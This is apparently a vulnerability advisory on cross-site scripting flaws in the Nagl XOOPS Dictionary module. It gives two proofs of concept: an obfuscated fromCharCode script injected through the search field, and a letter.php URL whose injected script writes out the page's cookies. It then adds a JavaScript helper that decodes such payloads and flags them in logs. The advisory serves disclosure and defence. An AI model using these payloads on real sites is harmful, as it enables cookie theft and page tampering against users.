Nagl XOOPS Dictionary Module Multiple Cross-Site Vulnerabilities
No exploit is required to leverage this issue. The following proof of concept has been provided:

The following script passed to the 'search' field of the 'search.php' script will reportedly trigger this issue:

    <script>
    function xss (){
      var tag=String.fromCharCode(60)+String.fromCharCode(105)+
        String.fromCharCode(109)+String.fromCharCode(103)+String.fromCharCode(32)+
        String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+
        String.fromCharCode(32)+String.fromCharCode(61);
      var web=String.fromCharCode(104)+String.fromCharCode(116)+
        String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+
        String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(119)+
        String.fromCharCode(119)+String.fromCharCode(119)+String.fromCharCode(46)+
        String.fromCharCode(103)+String.fromCharCode(111)+String.fromCharCode(111)+
        String.fromCharCode(103)+String.fromCharCode(108)+String.fromCharCode(101)+
        String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+
        String.fromCharCode(109);
      var path=String.fromCharCode(47)+String.fromCharCode(105)+
        String.fromCharCode(109)+String.fromCharCode(97)+String.fromCharCode(103)+
        String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(47)+
        String.fromCharCode(103)+String.fromCharCode(111)+String.fromCharCode(111)+
        String.fromCharCode(103)+String.fromCharCode(108)+String.fromCharCode(101)+
        String.fromCharCode(95)+String.fromCharCode(56)+String.fromCharCode(48)+
        String.fromCharCode(119)+String.fromCharCode(104)+String.fromCharCode(116)+
        String.fromCharCode(46)+String.fromCharCode(103)+String.fromCharCode(105)+
        String.fromCharCode(102)+String.fromCharCode(62);
      document.write(tag+web+path);
    }
    xss()
    </script>

The following proof of concept has been provided for the 'letter.php' script issue:

    ttp://attaker/modules/dictionary/letter.php?letter="><script>document.write(document.cookie)<script>(
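
The 'search' proof of concept builds its markup from character codes, so a log search for literal tag names will not match what it writes. The following is an added example, not part of the original advisory: a triage helper that decodes such chains in a logged parameter value and flags the patterns both proofs of concept rely on. The function names, flag labels and shortened sample values are assumptions made for illustration.

```javascript
// Added example (not from the advisory): triage a logged parameter value.
// A run of String.fromCharCode(n) calls joined by "+" is decoded so the text
// it would build at run time can be inspected and matched.
const CALL = String.raw`String\.fromCharCode\(\s*\d+(?:\s*,\s*\d+)*\s*\)`;
const CHAIN = new RegExp(`${CALL}(?:\\s*\\+\\s*${CALL})*`, "g");

// Returns the decoded text of every fromCharCode chain found, in order.
function decodeCharCodeChains(value) {
  return (value.match(CHAIN) || []).map((chain) =>
    String.fromCharCode(...chain.match(/\d+/g).map(Number)));
}

// URL-decodes the value when possible, then reports decoded chains and flags.
function triageParam(raw) {
  let value = raw;
  try { value = decodeURIComponent(raw); } catch (e) { /* keep raw on bad escapes */ }
  const decoded = decodeCharCodeChains(value);
  const flags = [];
  if (/<\s*\/?\s*script\b/i.test(value)) flags.push("script-tag");
  if (/["']\s*>/.test(value)) flags.push("attribute-breakout");
  if (decoded.some((text) => /[<>]/.test(text))) flags.push("charcode-markup");
  return { decoded, flags };
}

// Constructed samples, shortened from the two proofs of concept on this page.
const searchSample =
  "<script>var tag=String.fromCharCode(60)+String.fromCharCode(105)+" +
  "String.fromCharCode(109)+String.fromCharCode(103);document.write(tag)</script>";
const letterSample = "%22%3E%3Cscript%3Edocument.write(document.cookie)%3Cscript%3E(";
const benignSample = "firewall";

for (const sample of [searchSample, letterSample, benignSample]) {
  console.log(JSON.stringify(triageParam(sample)));
}
```

Matching of this kind is for log review only; the fix for both issues is to HTML-encode the 'search' and 'letter' values wherever the module writes them into a page.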